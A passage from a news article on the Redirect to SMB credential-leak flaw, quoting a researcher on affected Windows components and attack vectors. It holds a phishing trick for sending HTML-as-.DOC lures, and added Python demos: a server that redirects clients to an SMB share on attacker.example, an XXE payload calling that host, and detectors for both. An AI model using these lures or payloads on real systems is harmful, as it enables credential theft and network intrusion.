18-year-old SMB vulnerability resurfaces, dozens of vendors affected

New methods expand the attack surface to applications and software beyond Windows

Page 2 of 3

So what's vulnerable?

Internet Explorer has been vulnerable to the direct attack (a page element pointing straight at a file:// UNC path) for nearly two decades, and it is also vulnerable to the Redirect to SMB attack. The WebBrowser control in .NET, which wraps the same Internet Explorer rendering engine, is vulnerable as well.

"If the target is not using Internet Explorer, things get a bit trickier. My favorite way around this is to take a document from the organization's web site, save it as HTML, add an image link to my SMB server, rename the .HTML as .DOC, and email it as a 'typo correction' or 'sales inquiry' to various staff. When the users open the .DOC file, Word realizes it's HTML, and then renders it with Internet Explorer, triggering the outbound connection to the SMB server. If the organization allows VPN access, the stolen/cracked credentials can then be used to access the corporate network," Moore explained.

URLMon.dll, the Windows library that both Microsoft and third-party developers use for URL operations such as downloading files, has four functions that are vulnerable to both the direct attack from 1997 and the new Redirect to SMB attack. A fifth function is also vulnerable to the direct attack but, under normal circumstances, not to Redirect to SMB. Any application that passes an attacker-influenced URL to one of these functions inherits the problem, whether or not a browser is involved.

"If the application making this request calls one of the affected URLMon APIs, the machine will then make an outbound SMB connection. This significantly increases the effectiveness of man-in-the-middle attacks, even if the user isn't actively doing anything on the system," Moore added.

"I did a quick test by enabling HTTP tracing on my laptop, rebooting, and logging in. Over 100 different HTTP requests were made during that process, over half of which were not protected by SSL, and could be used to force an outbound SMB connection by a malicious attacker able to man-in-the-middle my traffic. Just resuming my laptop in a Starbucks would be enough to trigger this issue, which is a significant increase in exposure compared to an attacker having to wait for either Internet Explorer to be used or an outbound SMB connection to be made automatically."
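The exchange the URLMon discussion above describes, reduced to wire level, as an added example that is not part of the article or of the SPEAR report: a hypothetical attacker HTTP endpoint answers with a 302 whose Location is a file:// URL naming an SMB host (the host name attacker.example is assumed), and a client-side check of the kind a proxy or egress filter would run flags that response. The client here deliberately does not follow the redirect; it fetches once and inspects the Location header, because following it is exactly what the affected URLMon functions do before the machine opens an outbound SMB session.

```python
"""Redirect to SMB at wire level: an HTTP 302 that points into an SMB share.

Added example, not code from the article or from Cylance SPEAR.
attacker.example is an assumed, attacker-controlled host name.
"""
import http.client
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

SMB_HOST = "attacker.example"  # assumption: the attacker's SMB listener


class RedirectToSmbHandler(BaseHTTPRequestHandler):
    """Answer every GET with a redirect into \\\\SMB_HOST\\share."""

    def do_GET(self):
        # file://host/share/... is what a Windows client resolves to a UNC
        # path; an affected URLMon caller would open an SMB session to host
        # and authenticate without any user interaction.
        self.send_response(302)
        self.send_header("Location", f"file://{SMB_HOST}/share/logo.png")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet


class LoopbackServer(HTTPServer):
    def server_bind(self):
        # Skip HTTPServer's reverse DNS lookup of the bind address.
        socketserver.TCPServer.server_bind(self)


def start_server():
    """Bind the malicious endpoint on a random loopback port."""
    srv = LoopbackServer(("127.0.0.1", 0), RedirectToSmbHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_no_follow(host, port, path="/"):
    """One HTTP request, no redirect following; returns (status, Location)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def is_smb_redirect(status, location):
    """True when a redirect would push a Windows client onto SMB.

    Flags file:// URLs that name a remote host (file:///C:/... is local and
    left alone) and raw UNC paths; http(s) targets are not flagged.
    """
    if location is None or not 300 <= status < 400:
        return False
    target = location.strip()
    if target.startswith("\\\\"):
        return True
    parts = urlsplit(target)
    return parts.scheme.lower() == "file" and bool(parts.netloc)


def demo():
    """Run the exchange end to end; returns (status, location, flagged)."""
    srv = start_server()
    try:
        status, location = fetch_no_follow(*srv.server_address)
        return status, location, is_smb_redirect(status, location)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The check is intentionally narrow: it only looks at where a 3xx response sends the client. An egress filter that blocks TCP 445 and 139 to untrusted networks remains the stronger control, because the same SMB connection can be triggered by a direct file:// link with no redirect at all.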

SPEAR also found that XML External Entities (XXE), a feature many XML parsers support, can be abused to make the parser fetch a remote resource, so any application that parses attacker-supplied XML with external entities enabled is exposed to Redirect to SMB as well.
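The XXE path just mentioned, as an added example that is not from the article or the SPEAR report, using Python's standard-library SAX parser: a constructed document declares an external entity whose system identifier is a URL on an assumed attacker host. With external general entities enabled, the parser asks its entity resolver to fetch that URL the moment the entity is referenced; the resolver here records the request and hands back placeholder bytes instead of touching the network, so the outbound request is visible without being made. A parser on Windows that really fetched the URL through the affected URLMon functions would follow a 302 from that host into SMB. Python 3.7.1 and later ship with external general entities off by default, which the second configuration shows.

```python
"""XXE as an outbound-request primitive, using Python's xml.sax.

Added example, not code from the article or from Cylance SPEAR.
attacker.example is an assumed host; the document below is constructed.
"""
import io
import xml.sax
from xml.sax.handler import EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Constructed XXE document. The entity's SYSTEM id is a URL the attacker
# controls; a parser that honours external entities requests it when
# &logo; is expanded. A 302 from that server to file://host/share would
# turn the request into an SMB connection on a Windows client.
XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY logo SYSTEM "http://attacker.example/logo.png">
]>
<note><body>&logo;</body></note>
"""


class RecordingResolver(EntityResolver):
    """Entity resolver that logs every external fetch the parser attempts
    and substitutes placeholder bytes so nothing leaves the machine."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(b"placeholder"))
        return source


def external_requests(doc, allow_external_entities):
    """Parse doc and return the external URLs the parser asked for.

    allow_external_entities=True is the historic (vulnerable) configuration;
    False is the hardened one and the default in Python 3.7.1 and later.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    resolver = RecordingResolver()
    parser.setEntityResolver(resolver)
    parser.parse(io.BytesIO(doc))
    return resolver.requested


if __name__ == "__main__":
    print("external entities on :", external_requests(XXE_DOC, True))
    print("external entities off:", external_requests(XXE_DOC, False))
```

The recording resolver doubles as a cheap audit hook: dropping it into an existing parser configuration shows whether untrusted input can make that parser reach out at all, which is the property that matters here regardless of what the remote server answers.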

The report also lists the attack vectors that can deliver a Redirect to SMB response: direct man-in-the-middle, ARP cache poisoning, browser injection, the image preview feature in many chat applications, malicious documents, and DNS cache poisoning.

"In cases where you can't control the user's behavior (visiting a link or opening an email), you need to be able to control the actual network," Moore said.

"The problem with this approach is it depends on the user's machine doing something in order to trigger an SMB authentication. This could be accessing a file share, a printer, or another automated task that triggers an SMB connection. This can be time consuming, since you basically have to wait the user out, or get lucky with a share connection, in order to accomplish this attack through a man-in-the-middle. Unless the user opens Internet Explorer or makes an SMB connection directly, there is no guarantee this attack will be of much use."

Next: What software / applications are affected?
